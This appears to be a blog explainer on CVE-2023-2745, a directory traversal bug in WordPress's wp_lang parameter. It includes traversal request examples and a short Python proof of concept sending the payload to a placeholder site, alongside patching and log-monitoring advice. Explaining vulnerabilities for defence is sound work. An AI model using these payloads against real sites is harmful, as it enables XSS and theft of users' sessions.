CVE-2023-2745 - Directory Traversal in WordPress Core – What Happened, How it Works, and Real-World Dangers

WordPress powers over 40% of the web, but that popularity makes it a lucrative target for hackers. In this long read, we’ll break down CVE-2023-2745 — a Directory Traversal vulnerability found in WordPress Core (up to version 6.2) that could let attackers load and execute arbitrary files through the wp_lang parameter — no login required.

What is CVE-2023-2745?

Directory traversal means an attacker tricks software into reading files it shouldn’t, often using special URL or parameter values like ../ to climb up directories.

CVE-2023-2745 is just that — it’s a bug in the way WordPress handles the wp_lang parameter when loading translation files (those “.mo” or “.po” files that make WordPress multilingual). The vulnerability allows someone to specify a path *outside* of the expected translation folders, meaning an attacker can point WordPress to files they actually want loaded and parsed.

Who’s Affected?

This vulnerability affects any WordPress site up to, and including, version 6.2. All it takes is an open upload point — like a form, plugin, or theme feature that allows file uploads — and you could be at risk.

Let’s break this down step by step

1. The attacker somehow uploads a malicious translation file to the website. (This can happen via insecure plugins, file upload forms, or other weak points.)
2. The attacker crafts a request to the site’s front page or admin page, including the wp_lang parameter in the URL, but with a directory traversal payload — for example, wp_lang=../../uploads/evil_translation.
3. WordPress, failing to properly filter or sanitize the path, loads and executes the attacker’s translation file — which could contain malicious code.

A normal request

GET /?wp_lang=fr_FR

A malicious request abusing directory traversal

GET /?wp_lang=../../uploads/evil_translation

WordPress loads evil_translation.mo from a *user-controllable* location. If this file contains, for example, fake translated strings with embedded JavaScript, this could lead to Cross-Site Scripting (XSS).

Proof-of-Concept (PoC) Code

Below is a simple code snippet simulating an HTTP request that would exploit this vulnerability, assuming the attacker has managed to upload a translation file called evil_translation.mo to the uploads directory.

import requests

# Target WordPress URL
target_url = 'https://targetsite.com/';

# Malicious wp_lang parameter - traverses up directories
payload = '../../uploads/evil_translation'

# Send the exploit request
response = requests.get(f"{target_url}?wp_lang={payload}")

if "alert('XSS')" in response.text:
    print("Possible XSS via malicious translation file!")
else:
    print("Exploit attempt sent. Check for impact.")

A real-world attacker could use Burp Suite, curl, or their browser just as easily.

Real-World Attack Scenario

Let’s say your WordPress has a contact form plugin that lets users upload files (maybe a logo, maybe a resume, or even translation files). If that plugin doesn’t check for file types or restrict file locations, an attacker can upload a crafted .mo file.

Next, the attacker visits

https://yourblog.com/?wp_lang=../../wp-content/uploads/evil_file

If the translation file was crafted to include malicious JavaScript in translation strings (or unusual content that WordPress tries to display), this XSS payload might run in the context of your logged-in users. From there, they could steal cookies, perform actions as your users, or even escalate their access.

Check for endpoints or plugins on your site that allow uploads, especially translation files.

- Monitor your logs for odd wp_lang parameters, or for errors when trying to load non-standard language files.

References

- Original WPScan Entry – CVE-2023-2745
- WordPress Security Release Announcement
- National Vulnerability Database – CVE-2023-2745

Final Thoughts

Even subtle bugs like directory traversal can become high-impact when mixed with other insecure settings. CVE-2023-2745 is a reminder: patch promptly, and never trust user input — especially when it deals with files or directories.

If you’re a webmaster or developer running WordPress, make sure you’re on version 6.2.1 or above. Regular updates, code reviews, and good file handling are still your best shields against attacks like this.

Stay safe, and keep your WordPress fortress strong!


*This article was written exclusively to explain the real-world risk and technical details behind CVE-2023-2745. Please, only use this knowledge to defend and secure your sites. Doing otherwise may be illegal and unethical.*

Timeline

Published on: 05/17/2023 09:15:00 UTC
Last modified on: 05/26/2023 02:20:00 UTC